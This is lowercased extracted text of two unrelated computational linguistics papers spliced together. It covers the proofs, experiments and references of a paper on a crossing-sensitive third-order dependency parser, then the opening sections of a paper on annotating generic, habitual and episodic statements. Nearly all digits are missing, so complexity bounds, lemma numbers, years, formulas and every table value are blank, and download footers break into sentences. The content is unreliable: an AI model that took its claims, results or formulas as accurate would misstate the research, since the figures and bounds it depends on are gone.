grandpar- ent features, and ( ) trap[h, m, l] without a grand- parent index, scores the edge ~ehm without grand- parent features. triangles also have versions with (trig[h, e, g, l] and without (tri[h, e, l]) a grand- parent index. what follows shows that all gproj edges are added in trapg sub-problems, and all ¬gproj uncrossed edges are added in trap sub- problems. lemma . for all k ∈ (i, j), if badcontextl(i, j), then badcontextl(i, k). similarly, if badcontextr(i, j), then badcontextr(k, j). proof. badcontextl(i, j) implies either the edge from i’s parent to i is crossed and/or an edge from i to a child of i outer to j is crossed. if the edge from i’s parent to i is crossed, then badcontextl(i, k). if a child of i is outer to j, then since k ∈ (i, j), such a child is also outer to k. lemma . all left-rooted triangle sub-problems tri[i, j, l] without a grandparent index are in a badcontextl(i, j). similarly for all tri[i, j, r], badcontextr(i, j). proof. all triangles without grandparent indices are either placed immediately into a bad context (by adding a crossed edge to the triangle’s root from its parent, or a crossed edge from the root to an outer child) or are combined with other sub-trees to form larger crossing regions (and therefore the triangle is in a bad context, using lemmas and ). lemma . 
all triangle sub-problems with a grand- parent index trig[h, e, g, l] are placed in a ¬badcontextl(h, e). similarly, trig[e, h, g, r] are only placed in ¬badcontextr(h, e). proof. consider where a non-empty triangle (h = e) with a grandparent index trig[h, e, g, l] can be placed in the full dynamic program and what each step would imply about the rest of the tree. if the triangle contains exterior children of h (e and g are on opposite sides of h), then it can either combine with a trapezoid to form another larger tri- angle (as in figure a) or it can combine with an- other sub-problem to form a box with a grandpar- ent index (figure c or ). boxes with a grandpar- ent index can only combine with another trapezoid to form a larger trapezoid (figure b). both cases force ~egh to not be crossed and prevent h from hav- ing any outer crossed children, as h becomes an in- ternal node within the larger sub-problem. if the triangle contains interior children of h (e lies between g and h), then it can either form a trape- zoid from g to h by combining with a triangle (fig- ure b) or a chain of crossing edges (figure c), or it can be used to build a box with a grandparent index (figures c and ), which then can only be used to form a trapezoid from g to h. in either case, a trape- zoid is constructed from g to h, enforcing that ~egh cannot be crossed. these steps prevent h from hav- ing any additional children between g and e (since h does not appear in the adjacent sub-problems at all whenever h = e), so again the children of h in (e, h) have no outer siblings. lemma . in a trig[h, e, g, l] sub-problem, if an edge ~ehm is not crossed and no edges from i to sib- lings of m in (m, e] are crossed, then ~ehm is gproj . proof. this follows from ( ) the edge ~ehm is not crossed, ( ) the edge ~egh is not crossed by lemma , and ( ) no outer siblings are crossed (outer siblings in (m, e] are not crossed by assumption and siblings outer to e are not crossed by lemma ). lemma . an edge ~ehm scored with a grandsib or grand part (added through a trapg[h, m, g, l] or trapg[m, h, g, r] sub-problem) is gproj . proof. a trapg can either ( ) combine with de- scendants of m to form a triangle with a grandparent index rooted at h (indicating that m is the outermost inner child of h) or ( ) combine with descendants of m and of m’s adjacent outer sibling (call it o), forming a trapezoid from h to o (indicating that ~eho is not crossed). such a trapezoid could again only combine with further uncrossed outer siblings until eventually the final triangle rooted at h with grand- parent index g is built. as ~ehm was not crossed, no edges from h to outer siblings within the triangle are crossed, and ~ehm is within a trig sub-problem, ~ehm is gproj by lemma . lemma . an uncrossed edge ~ehm scored with a sib or edge part (added through a trap[h, m, l] or trap[m, h, r] sub-problem) is ¬gproj . proof. a trap can only ( ) form a triangle without a grandparent index, or ( ) form a trapezoid to an outer sibling of m, until eventually a final triangle rooted at h without a grandparent index is built. this triangle without a grandparent index is then placed in a bad context (lemma ) and so ~ehm is ¬gproj (corollary ). . main results lemma . the crossing-sensitive third-order parser runs in o(n ) time and o(n ) space when the input is an unpruned graph. when the input to the parser is a pruned graph with at most k in- coming edges per node, the crossing-sensitive third- order parser runs in o(kn ) time and o(n ) space. proof. 
all sub-problems are either over intervals (two indices), intervals with a grandparent index (three indices), or crossing regions (three indices). no crossing regions require any grandparent indices (corollary ). the only sub-problems that require a maximization over two internal split points are over intervals and need no grandparent indices (as the furthest edges from each root are guaranteed to be crossed within the sub-problem). all steps ei- ther contain an edge in their construction step or in the invariant of the sub-problem, so with a pruned graph as input, the running time is the number of edges (o(kn)) times the number of possibilities for the other two free indices (o(n )). the space is not reduced as there is not necessarily an edge relation- ship between the three stored vertices. theorem . the grandsib-crossing parser cor- rectly finds the maximum scoring -endpoint- crossing tree according to the crossing-sensitive third-order factorization (section ) in o(n ) time and o(n ) space. when the input to the parser is a pruned graph with at most k incoming edges per node, the grandsib-crossing parser correctly finds the maximum scoring -endpoint-crossing tree that uses only unpruned edges in o(kn ) time and o(n ) space. proof. the correctness of scoring follows from lemmas , , and . the search space of - endpoint-crossing trees was in lemma and the time and space complexity in lemma . the parser produces the optimal tree in a well- defined output space. pruning edges restricts the output space the same way that constraints enforc- ing projectivity or the -endpoint-crossing property also restrict the output space. note that if the optimal unconstrained -endpoint-crossing tree does not in- clude any pruned edges, then whether the parser uses pruning or not is irrelevant; both the pruned and un- pruned parsers will produce the exact same tree. experiments the crossing-sensitive third-order parser was imple- mented as an alternative parsing algorithm within dpo (koo and collins, ). to ensure a fair comparison, all code relating to input/output, fea- tures, learning, etc. was re-used from the origi- nal projective implementation, and so the only sub- stantive differences between the projective and - endpoint-crossing parsers are the dynamic pro- gramming charts, the parsing algorithms, and the routines that extract the maximum scoring tree from the completed chart. the treebanks used to prepare the conll shared task data (buchholz and marsi, ; nivre et al., ) vary widely in their conventions for repre- senting conjunctions, modal verbs, determiners, and other decisions (zeman et al., ). the exper- iments use the newly released hamledt software (zeman et al., ) that normalizes these treebanks into one standard format and also provides built-in transformations to other conjunction styles. the un- normalized treebanks input to hamledt were from the conll shared task (buchholz and marsi, ) for danish, dutch, portuguese, and swedish and from the conll shared task (nivre et al., ) for czech. the experiments include the default prague style (böhmová et al., ), mel’čukian style (mel’čuk, ), and stanford style (de marneffe and manning, ) for conjunctions. under the grandparent-sibling factorization, the two words be- ing conjoined would never appear in the same scope for the prague style (as they are siblings on differ- ent sides of the conjunct head). 
in the mel’čukian style, the two conjuncts are in a grandparent rela- tionship and in the stanford style the two conjuncts http://groups.csail.mit.edu/nlp/dpo / are in a sibling relationship, and so we would expect to see larger gains for including grandparents and siblings under the latter two representations. the experiments also include a nearly projective dataset, the english penn treebank (marcus et al., ), converted to dependencies with pennconverter (jo- hansson and nugues, ). the experiments use marginal-based pruning based on an edge-factored directed spanning tree model (mcdonald et al., ). each word’s set of potential parents is limited to those with a marginal probability of at least . times the probability of the most probable parent, and cut off this list at a max- imum of potential parents per word. to ensure that there is always at least one projective and/or - endpoint-crossing tree achievable, the artificial root is always included as an option. the pruning param- eters were chosen to keep . % of the true edges on the english development set. following carreras ( ) and koo and collins ( ), before training the training set trees are transformed to be the best achievable within the model class (i.e., the closest projective tree or - endpoint-crossing tree). all models are trained for five iterations of averaged structured perceptron training. for english, the model after the iteration that performs best on the development set is used; for all other languages, the model after the fifth iter- ation is used. . results results for edge-factored and (crossing-sensitive) grandparent-sibling factored models for both projec- tive and -endpoint-crossing parsing are in tables and . in out of the experimental set-ups, the third-order -endpoint-crossing parser is more accurate than the third-order projective parser. it is significantly better than the projective parser in of the set-ups and significantly worse in none. table shows how often the -ec cs-gsib parser used each of the grandsib, grand, sib, edge, and crossededge parts for the mel’čukian and stanford style test sets. in both representations, following prior work in graph-based dependency parsing (for example, rush and petrov ( )), english results use au- tomatically produced part-of-speech tags and results exclude punctuation, while the results for all other languages use gold part-of-speech tags and include punctuation. model du cz pt da sw prague proj gsib . . . . . proj edge . . . . . -ec cs-gsib . . . . . -ec edge . . . . . mel’čukian proj gsib . . . . . proj edge . . . . . -ec cs-gsib . . . . . -ec edge . . . . . stanford proj gsib . . . . . proj edge . . . . . -ec cs-gsib . . . . . -ec edge . . . . . table : overall unlabeled attachment scores (uas) for all words. cs-gsib is the proposed crossing-sensitive grandparent-sibling factorization. for each data set, we bold the most accurate model and those not significantly different from the most accurate (sign test, p < . ). lan- guages are sorted in increasing order of projectivity. model uas proj gsib . proj edge . -ec cs-gsib . -ec edge . table : english results the parser is able to score with a sibling context more often than it is able to score with a grandpar- ent, perhaps explaining why the datasets using the stanford conjunction representation saw the largest gains from including the higher order factors into the -endpoint-crossing parser. across languages, the third-order -endpoint- crossing parser runs . - . 
times slower than the third-order projective parser ( - words per sec- ond, compared with - words per second). parsing speed is correlated with the amount of prun- ing. the level of pruning mentioned earlier is rela- tively permissive, retaining . - . % of the edges in the complete graph; a higher level of pruning could likely achieve much faster parsing times with the same underlying parsing algorithms. part used du cz pt da sw mel’čukian crossededge . . . . . grandsib . . . . . grand . . . . . sib . . . . . edge < . < . < . stanford crossededge . . . . . grandsib . . . . . grand . . . . . sib . . . . . edge < . . < . table : the proportion of edges in the predicted output trees from the cs-gsib -endpoint-crossing parser that would have used each of the five part types for scoring. discussion there have been many other notable approaches to non-projective parsing with larger scopes than single edges, including transition-based parsers, directed spanning tree graph-based parsers, and mildly non- projective graph-based parsers. transition-based parsers score actions that the parser may take to transition between different configurations. these parsers typically use either greedy or beam search, and can condition on any tree context that is in the history of the parser’s actions so far. zhang and nivre ( ) signifi- cantly improved the accuracy of an arc-eager tran- sition system (nivre, ) by adding several ad- ditional classes of features, including some third- order features. basic arc-eager and arc-standard (nivre, ) models that parse left-to-right using a stack produce projective trees, but transition-based parsers can be modified to produce crossing edges. such modifications include pseudo-projective pars- ing in which the dependency labels encode transfor- mations to be applied to the tree (nivre and nilsson, ), adding actions that add edges to words in the stack that are not the topmost item (attardi, ), adding actions that swap the positions of words (nivre, ), and adding a second stack (gómez- rodrı́guez and nivre, ). graph-based approaches to non-projective pars- ing either consider all directed spanning trees or re- stricted classes of mildly non-projective trees. di- rected spanning tree approaches with higher order features either use approximate learning techniques, such as loopy belief propagation (smith and eis- ner, ), or use dual decomposition to solve relax- ations of the problem (koo et al., ; martins et al., ). while not guaranteed to produce optimal trees within a fixed number of iterations, these dual decomposition techniques do give certificates of op- timality on the instances in which the relaxation is tight and the algorithm converges quickly. this paper described a mildly non-projective graph-based parser. other parsers in this class find the optimal tree in the class of well-nested, block degree two trees (gómez-rodrı́guez et al., ), or in a class of trees further restricted based on gap inheritance (pitler et al., ) or the head-split property (satta and kuhlmann, ), with edge- factored running times of o(n ) − o(n ). the factorization used in this paper is not immediately compatible with these parsers: the complex cases in these parsers are due to gaps, not crossings. how- ever, there may be analogous “gap-sensitive” factor- izations that could allow these parsers to be extended without large increases in running times. conclusion this paper proposed an exact, graph-based algo- rithm for non-projective parsing with higher order features. 
the resulting parser has the same asymp- totic run time as a third-order projective parser, and is significantly more accurate for many experimental settings. an exploration of other factorizations that facilitate non-projective parsing (for example, an analogous “gap-sensitive” variant) may be an inter- esting avenue for future work. recent work has in- vestigated faster variants for third-order graph-based projective parsing (rush and petrov, ; zhang and mcdonald, ) using structured prediction cascades (weiss and taskar, ) and cube prun- ing (chiang, ). it would be interesting to extend these lines of work to the crossing-sensitive third- order parser as well. acknowledgments i would like to thank sampath kannan, mitch mar- cus, chris callison-burch, michael collins, mark liberman, ben taskar, joakim nivre, and the three anonymous reviewers for valuable comments on ear- lier versions of this material. references g. attardi. . experiments with a multilanguage non-projective dependency parser. in proceedings of conll, pages – . a. böhmová, j. hajič, e. hajičová, and b. hladká. . the prague dependency treebank: three-level anno- tation scenario. in anne abeillé, editor, treebanks: building and using syntactically annotated corpora, pages – . kluwer academic publishers. b. bohnet and j. kuhn. . the best of both worlds – a graph-based completion model for transition-based parsers. in proceedings of eacl, pages – . s. buchholz and e. marsi. . conll-x shared task on multilingual dependency parsing. in proceedings of conll, pages – . x. carreras. . experiments with a higher-order projective dependency parser. in proceedings of the conll shared task session of emnlp-conll, pages – . e. charniak and m. johnson. . coarse-to-fine n- best parsing and maxent discriminative reranking. in proceedings of acl, pages – . d. chiang. . hierarchical phrase-based translation. computational linguistics, ( ): – . m. de marneffe and c. manning. . stanford typed dependencies manual. j. eisner. . bilexical grammars and their cubic- time parsing algorithms. in harry bunt and anton nijholt, editors, advances in probabilistic and other parsing technologies, pages – . kluwer academic publishers. c. gómez-rodrı́guez and j. nivre. . a transition- based parser for -planar dependency structures. in proceedings of acl, pages – . c. gómez-rodrı́guez, j. carroll, and d. weir. . de- pendency parsing schemata and mildly non-projective dependency parsing. computational linguistics, ( ): – . k. hall. . k-best spanning tree parsing. in proceed- ings of acl, pages – . r. johansson and p. nugues. . extended constituent-to-dependency conversion for english. in proceedings of the th nordic conference on com- putational linguistics (nodalida), pages – . t. koo and m. collins. . efficient third-order de- pendency parsers. in proceedings of acl, pages – . t. koo, a. m. rush, m. collins, t. jaakkola, and d. son- tag. . dual decomposition for parsing with non- projective head automata. in proceedings of emnlp, pages – . t. koo. . advances in discriminative dependency parsing. ph.d. thesis, massachusetts institute of tech- nology. s. kübler, r. mcdonald, and j. nivre. . depen- dency parsing. synthesis lectures on human lan- guage technologies, ( ): – . m. p. marcus, m. a. marcinkiewicz, and b. santorini. . building a large annotated corpus of en- glish: the penn treebank. computational linguistics, ( ): – . a. f. t. martins, n. a. smith, and e. p. xing. . concise integer linear programming formulations for dependency parsing. 
in proceedings of acl, pages – . a. martins, m. almeida, and n. a. smith. . turn- ing on the turbo: fast third-order non-projective turbo parsers. in proceedings of acl (short papers), pages – . r. mcdonald and f. pereira. . online learning of approximate dependency parsing algorithms. in pro- ceedings of eacl, pages – . r. mcdonald and g. satta. . on the complexity of non-projective data-driven dependency parsing. in proceedings of the th international conference on parsing technologies, pages – . r. mcdonald, f. pereira, k. ribarov, and j. hajič. . non-projective dependency parsing using span- ning tree algorithms. in proceedings of hlt/emnlp, pages – . i. mel’čuk. . dependency syntax: theory and practice. state university of new york press. j. nivre and j. nilsson. . pseudo-projective depen- dency parsing. in proceedings of acl, pages – . j. nivre, j. hall, s. kübler, r. mcdonald, j. nilsson, s. riedel, and d. yuret. . the conll shared task on dependency parsing. in proceedings of the conll shared task session of emnlp-conll, pages – . j. nivre. . an efficient algorithm for projective de- pendency parsing. in proceedings of the th interna- tional workshop on parsing technologies, pages – . j. nivre. . incrementality in deterministic depen- dency parsing. in proceedings of the workshop on in- cremental parsing: bringing engineering and cogni- tion together, pages – . j. nivre. . non-projective dependency parsing in expected linear time. in proceedings of acl, pages – . e. pitler, s. kannan, and m. marcus. . dynamic programming for higher order parsing of gap-minding trees. in proceedings of emnlp, pages – . e. pitler, s. kannan, and m. marcus. . find- ing optimal -endpoint-crossing trees. transac- tions of the association for computational linguistics, (mar): – . a. rush and s. petrov. . vine pruning for effi- cient multi-pass dependency parsing. in proceedings of naacl, pages – . g. satta and m. kuhlmann. . efficient parsing for head-split dependency trees. transactions of the as- sociation for computational linguistics, (july): – . d. a. smith and j. eisner. . dependency parsing by belief propagation. in proceedings of emnlp, pages – . d. weiss and b. taskar. . structured prediction cascades. in aistats, pages – . d. zeman, d. mareček, m. popel, l. ramasamy, j. štěpánek, z. žabokrtský, and j. hajič. . ham- ledt: to parse or not to parse? in proceedings of the eight international conference on language re- sources and evaluation (lrec’ ), pages – . h. zhang and r. mcdonald. . generalized higher- order dependency parsing with cube pruning. in pro- ceedings of emnlp, pages – . y. zhang and j. nivre. . transition-based depen- dency parsing with rich non-local features. in pro- ceedings of acl (short papers), pages – . decomposing generalization models of generic, habitual, and episodic statements venkata govindarajan university of rochester benjamin van durme johns hopkins university aaron steven white university of rochester abstract we present a novel semantic framework for modeling linguistic expressions of generalization— generic, habitual, and episodic statements—as combinations of simple, real-valued referen- tial properties of predicates and their argu- ments. we use this framework to construct a dataset covering the entirety of the universal dependencies english web treebank. 
we use this dataset to probe the efficacy of type-level and token-level information—including hand- engineered features and static (glove) and contextual (elmo) word embeddings—for predicting expressions of generalization. introduction natural language allows us to convey not only information about particular individuals and events, as in example ( ), but also generalizations about those individuals and events, as in ( ). ( ) a. mary ate oatmeal for breakfast today. b. the students completed their assignments. ( ) a. mary eats oatmeal for breakfast. b. the students always complete their assign- ments on time. this capacity for expressing generalization is extremely flexible—allowing for generalizations about the kinds of events that particular individuals are habitually involved in, as in ( ), as well as characterizations about kinds of things, as in ( ). ( ) a. bishops move diagonally. b. soap is used to remove dirt. such distinctions between episodic statements ( ), on the one hand, and habitual ( ) and generic (or characterizing) statements ( ), on the other, have a long history in both the linguistics and artificial intelligence literatures (see carlson, ; maienborn et al., ; leslie and lerner, ). nevertheless, few modern semantic parsers make a systematic distinction (cf. abzianidze and bos, ). this is problematic, because the ability to accurately capture different modes of generaliza- tion is likely key to building systems with robust common sense reasoning (zhang et al., a; bauer et al., ): such systems need some source for general knowledge about the world (mccarthy, , , ; minsky, ; schank and abelson, ; hobbs et al., ; reiter, ) and natural language text seems like a prime candidate. it is also surprising, because there is no dearth of data relevant to linguistic expressions of generalization (doddington et al., ; cybulska and vossen, b; friedrich et al., ). one obstacle to further progress on general- ization is that current frameworks tend to take standard descriptive categories as sharp classes— for example, episodic, generic, habitual for state- ments and kind, individual for noun phrases. this may seem reasonable for sentences like ( a), where mary clearly refers to a particular individual, or ( a), where bishops clearly refers to a kind; but natural text is less forgiving (grimm, , , ). consider the under- lined arguments in ( ): do they refer to kinds or individuals? ( ) a. i will manage client expectations. b. the atmosphere may not be for everyone. c. thanks again for great customer service! to remedy this, we propose a novel frame- work for capturing linguistic expressions of generalization. taking inspiration from decompo- sitional semantics (reisinger et al., ; white et al., ), we suggest that linguistic expressions transactions of the association for computational linguistics, vol. , pp. – , . https://doi.org/ . /tacl a action editor: christopher potts. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://doi.org/ . /tacl_a_ of generalization should be captured in a contin- uous multi-label system, rather than a multi-class system. we do this by decomposing categories such as episodic, habitual, and generic into simple referential properties of predicates and their argu- ments. 
using this framework (§ ), we develop an annotation protocol, which we validate (§ ) and compare against previous frameworks (§ ). we then deploy this framework (§ ) to construct a new large-scale dataset of annotations covering the entire universal dependencies (de marneffe et al., ; nivre et al., ) english web treebank (ud-ewt; bies et al., ; silveira et al., )—yielding the universal decompo- sitional semantics-genericity (uds-g) dataset. through exploratory analysis of this dataset, we demonstrate that this multi-label framework is well-motivated (§ ). we then present models for predicting expressions of linguistic general- ization that combine hand-engineered type and token-level features with static and contextual learned representations (§ ). we find that (i) referential properties of arguments are easier to predict than those of predicates; and that (ii) contextual learned representations contain most of the relevant information for both arguments and predicates (§ ). background most existing annotation frameworks aim to cap- ture expressions of linguistic generalization using multi-class annotation schemes. we argue that this reliance on multi-class annotation schemes is problematic on the basis of descriptive and theoretical work in the linguistics literature. one of the earliest frameworks explicitly aimed at capturing expressions of linguistic general- ization was developed under the ace- program (mitchell et al., ; doddington et al., , and see reiter and frank, ). this framework associates entity mentions with discrete labels for whether they refer to a specific member of the set in question (specific) or any member of the set in question (generic). the ace- multilingual training corpus (walker et al., ) extends these annotation guidelines, providing two additional classes: (i) negatively quantified entries (neg) for referring to empty sets and (ii) data, code, protocol implementation, and task instruc- tions provided to annotators are available at decomp.io. underspecified entries (usp), where the referent is ambiguous between generic and specific. the existence of the usp label already portends an issue with multi-class annotation schemes, which have no way of capturing the well-known phenomena of taxonomic reference (see carlson and pelletier, , and references therein), abstract/event reference (grimm, , , ), and weak definites (carlson et al., ). for example, wines in ( ) refers to particular kinds of wine; service in ( ) refers to an abstract entity/event that could be construed as both particular-referring, in that it is the service at a specific restaurant, and kind-referring, in that it encompasses all service events at that restaurant; and bus in ( ) refers to potentially multiple distinct buses that are grouped into a kind by the fact that they drive a particular line. ( ) that vintner makes three different wines. ( ) the service at that restaurant is excellent. ( ) that bureaucrat takes the bus to work. this deficit is remedied to some extent in the arrau (poesio et al., , and see mathew, ; louis and nenkova, ) and ecb+ (cybulska and vossen, a,b) corpora. the arrau corpus is mainly intended to capture anaphora resolution, but following the gnome guidelines (poesio, ), it also annotates entity mentions for a generic attribute, sensitive to whether the mention is in the scope of a relevant semantic operator (e.g., a conditional or quantifier) and whether the nominal refers to a type of object whose genericity is left underspecified, such as a substance. 
the ecb+ corpus is an extension of the eventcorefbank (ecb; bejan and harabagiu, ; lee et al., ), which annotates google news texts for event coreference in accordance with the timeml specification (pustejovsky et al., ), and is an improvement in the sense that, in addition to entity mentions, event mentions may be labeled with a generic class. the ecb+ approach is useful, since episodic, habitual, and generic statements can straightfor- wardly be described using combinations of event and entity mention labels. for example, in ecb+, episodic statements involve only non-generic entity and event mentions; habitual statements involve a generic event mention and at least one downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april http://decomp.io non-generic entity mention; and generic state- ments involve generic event mentions and at least one generic entity mention. this demonstrates the strength of decomposing statements into proper- ties of the events and entities they describe; but there remain difficult issues arising from the fact that the decomposition does not go far enough. one is that, like ace- / and arrau, ecb+ does not make it possible to capture taxonomic and abstract reference or weak definites; another is that, because ecb+ treats generics as mutu- ally exclusive from other event classes, it is not possible to capture that events and states in those classes can themselves be particular or generic. this is well known for different classes of events, such as those determined by a predicate’s lex- ical aspect (vendler, ); but it is likely also important for distinguishing more particular stage- level properties (e.g., availability ( )) from more generic individual-level properties (e.g., strength ( )) (carlson, ). ( ) those firemen are available. ( ) those firemen are strong. this situation is improved upon in the richer event descriptions (red; o’gorman et al., ) and situation entities (sitent; friedrich and palmer, a,b; friedrich et al., ; friedrich and pinkal, b,a; friedrich et al., ) frame- works, which annotate both nps and entire clauses for genericity. in particular, sitent, which is used to annotate masc (ide et al., ) and wikipedia, has the nice property that it rec- ognizes the existence of abstract entities and lexical aspectual class of clauses’ main verbs, along with habituality and genericity. this is use- ful because, in addition to decomposing state- ments using the genericity of the main referent and event, this framework recognizes that lexical as- pect is an independent phenomenon. in practice, however, the annotations produced by this frame- work are mapped into a multi-class scheme contain- ing only the high-level generic-habitual-episodic distinction—alongside a conceptually indepen- dent distinction among illocutionary acts. a potential argument in favor of mapping into a multi-class scheme is that, if it is sufficiently elaborated, the relevant decomposition may be recoverable. but regardless of such an elaboration, uncertainty about which class any particular entity or event falls into cannot be ignored. some ex- amples may just not have categorically correct answers; and even if they do, annotator uncertainty and bias may obscure them. to account for this, we develop a novel annotation framework that both (i) explicitly captures annotator confidence about the different referential properties discussed above and (ii) attempts to correct for annotator bias using standard psycholinguistic methods. 
annotation framework we divide our framework into two protocols—the argument and predicate protocols—that probe properties of individuals and situations (i.e., events or states) referred to in a clause. drawing inspiration from prior work in decompositional semantics (white et al., ), a crucial aspect of our framework is that (i) multiple properties can be simultaneously true for a particular individual or situation (event or state); and (ii) we explicitly collect confidence ratings for each property. this makes our framework highly extensible, because further properties can be added without breaking a strict multi-class ontology. drawing inspiration from the prior literature on generalization discussed in § and § , we focus on properties that lie along three main axes: whether a predicate or its arguments refer to (i) instantiated or spatiotemporally delimited (i.e., particular) situations or individuals; (ii) classes of situations (i.e., hypothetical situations) or kinds of individuals; and/or (iii) intangible (i.e., abstract concepts or stative situations). this choice of axes is aimed at allowing our framework to capture not only the standard episodic-habitual-generic distinction, but also phenomena that do not fit neatly into this dis- tinction, such as taxonomic reference, abstract reference, and weak definites. the idea here is similar to prior decompositional semantics work on semantic protoroles (reisinger et al., ; white et al., , ), which associates categories like agent or patient with sets of more basic properties, such as volitionality, causation, change-of-state, and so forth, and is similarly inspired by classic theoretical work (dowty, ). in our framework, prototypical episodics, habit- uals, and generics correspond to sets of properties that the referents of a clause’s head predicate and arguments have—namely, clausal categories are built up from properties of the predicates that head downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : examples of argument protocol (top) and predicate protocol (bottom). them along with those predicates’ arguments. for instance, prototypical episodic statements, like those in ( ), have arguments that only refer to particular, non-kind, non-abstract individuals and a predicate that refers to a particular event or (possibly) state; prototypical habitual statements, like those in ( ) have arguments that refer to at least one particular, non-kind, non-abstract individual and a predicate that refers to a non-particular, dynamic event; and prototypical generics, like those in ( ), have arguments that only refer to kinds of individuals and a predicate that refers to non-particular situations. it is important to note that these are all proto- typical properties of episodic, habitual, or generic statements, in the same way that volitionality is a prototypical property of agents and change-of- state is a prototypical property of patients. that is, our framework explicitly allows for bleed between categories because it only commits to the referen- tial properties, not the categories themselves. it is this ambivalence toward sharp categories that also allows our framework to capture phenomena that fall outside the bounds of the standard three-way distinction. 
for instance, taxonomic reference, as in ( ), and weak definites, as in ( ), prototypically involve an argument being both particular- and kind-referring; stage-level properties, as in ( ), prototypically involve particular, non-dynamic situations, while individual-level properties, as in ( ), prototypically involve non-particular, non- dynamic situations. figure shows examples of the argument pro- tocol (top) and predicate protocol (bottom), whose implementation is based on the event factuality annotation protocol described by white et al. ( ) and rudinger et al. ( ). annotators are presented with a sentence with one or many words highlighted, followed by statements pertain- ing to the highlighted words in the context of the sentence. they are then asked to fill in the statement with a binary response saying whether it does or does not hold and to give their confidence on a -point scale—not at all confident ( ), not very confident ( ), somewhat confident ( ), very confident ( ), and totally confident ( ). framework validation to demonstrate the efficacy of our framework for use in bulk annotation (reported in § ), we conduct a validation study on both our predicate and argument protocols. the aim of these studies is to establish that annotators display reasonable agreement when annotating for the properties in each protocol, relative to their reported confi- dence. we expect that, the more confident both annotators are in their annotation, the more likely it should be that annotators agree on those annotations. to ensure that the findings from our validation studies generalize to the bulk annotation setting, we simulate the bulk setting as closely as pos- sible: (i) randomly sampling arguments and pre- dicates for annotation from the same corpus we conduct the bulk annotation on ud-ewt; and (ii) allowing annotators to do as many or as few annotations as they would like. this design makes standard measures of interannotator agreement somewhat difficult to accurately compute, because different pairs of annotators may annotate only a small number of overlapping items (arguments/ predicates), so we turn to standard statistical methods from psycholinguistics to assist in esti- mation of interannotator agreement. predicate and argument extraction we ex- tracted predicates and their arguments from the gold ud parses from ud-ewt using predpatt (white et al., ; zhang et al., b). from the ud-ewt training set, we then randomly sampled arguments from those headed by a det, num, noun, propn, or pron and predicates from downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april those headed by a adj, noun, num, det, propn, pron, verb, or aux. annotators a total of annotators were re- cruited from amazon mechanical turk to anno- tate arguments; and annotators were recruited to annotate predicates. in both cases, arguments and predicates were presented in batches of , with each predicate and argument annotated by annotators. confidence normalization because different annotators use the confidence scale in different ways (e.g., some annotators use all five options while others only ever respond with totally confident ( )) we normalize the confidence ratings for each property using a standard ordinal scale normalization technique known as ridit scoring (agresti, ). in ridit scoring, ordinal labels are mapped to ( , ) using the empirical cumulative distribution function of the ratings given by each annotator. 
specifically, for the responses y(a) given by annotator a, ridity(a) ( y (a) i ) = ecdfy(a) ( y (a) i − ) + . × ecdfy(a) ( y (a) i ) . ridit scoring has the effect of reweighting the importance of a scale label based on the frequency with which it is used. for example, insofar as an annotator rarely uses extreme values, such as not at all confident or totally confident, the annotator is likely signaling very low or very high confidence, respectively, when they are used; and insofar as an annotator often uses extreme values, the annotator is likely not signaling particularly low or particularly high confidence. interannotator agreement (iaa) common iaa statistics, such as cohen’s or fleiss’ κ, rely on the ability to compute both an expected agreement pe and an observed agreement po, with κ ≡ po−pe −pe . such a computation is relatively straightforward when a small number of annotators annotate many items, but when many annotators each annotate a small number of items pairwise, pe and po can be difficult to estimate accurately, especially for annotators that only annotate a few items total. further, there is no standard way to incorporate confidence ratings, like the ones we collect, into these iaa measures. to overcome these obstacles, we use a com- bination of mixed and random effects models (gelman and hill, ), which are extremely common in the analysis of psycholinguistic data property β̂ σ̂ann σ̂item a rg um en t is.particular . . . is.kind − . . . is.abstract − . . . p re di ca te is.particular . . . is.dynamic . . . is.hypothetical − . . . table : bias (log-odds) for answering true. (baayen, ), to estimate pe and po for each property. the basic idea behind using these models is to allow our estimates of pe and po to be sensi- tive to the number of items annotators anno- tated as well as how annotators’ confidence relates to agreement. to estimate pe for each property, we fit a random effects logistic regression to the binary responses for that property, with random intercepts for both annotator and item. the fixed intercept estimate β̂ for this model is an estimate of the log-odds that the average annotator would answer true on that property for the average item; and the random intercepts give the distribution of actual annotator (σ̂ann) or item (σ̂item) biases. table gives the estimates for each property. we note a substantial amount of variability in the bias different annotators have for answering true on many of these properties. this variability is evidenced by the fact that σ̂ann and σ̂item are similar across properties, and it suggests the need to adjust for annotator biases when analyzing these data, which we do both here and for our bulk annotation. to compute pe from these estimates, we use a parametric bootstrap. on each replicate, we sample annotator biases b , b independently from n(β̂ , σ̂ann), then compute the expected probability of random agreement in the standard way: π π + ( − π )( − π ), where πi = logit− (bi). we compute the mean across , such replicates to obtain pe, shown in table . to estimate po for each property in a way that takes annotator confidence into account, we first compute, for each pair of annotators, each item they both annotated, and each property they annotated that item on, whether or not they agree in their annotation. 
we then fit separate mixed effects logistic regressions for each property to this agreement variable, with a fixed intercept β and slope βconf for the product of the annotators’ downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april property pe κlow κhigh a rg um en t is.particular . . . is.kind . . . is. abstract . . . p re di ca te is.particular . − . . is.dynamic . − . . is.hypothetical . − . . table : interannotator agreement scores. confidence for that item and random intercepts for both annotator and item. we find, for all properties, that there is a reliable increase (i.e., a positive β̂conf) in agreement as annotators’ confidence ratings go up (ps < . ). this corroborates our prediction that annotators should have higher agreement for things they are confident about. it also suggests the need to incorporate confidence ratings into the annotations our models are trained on, which we do in our normalization of the bulk annotation responses. from the fixed effects, we can obtain an esti- mate of the probability of agreement for the average pair of annotators at each confidence level between and . we compute two versions of κ based on such estimates: κlow, which corresponds to confidence for at least one annotator in a pair, and κhigh, which corresponds to perfect confidence for both. table shows these κ estimates. as implied by reliably positive β̂confs, we see that κhigh is greater than κlow for all properties. further, with the exception of dynamic, κhigh is generally comparable to the κ estimates reported in annotations by trained annotators using a multi-class framework. for instance, compare the metrics in table to κann in table (see § for details), which gives the fleiss’ κ metric for clause types in the sitent dataset (friedrich et al., ). comparison to standard ontology to demonstrate that our framework subsumes standard distinctions (e.g., episodic v. habitual v. generic) we conduct a study comparing anno- 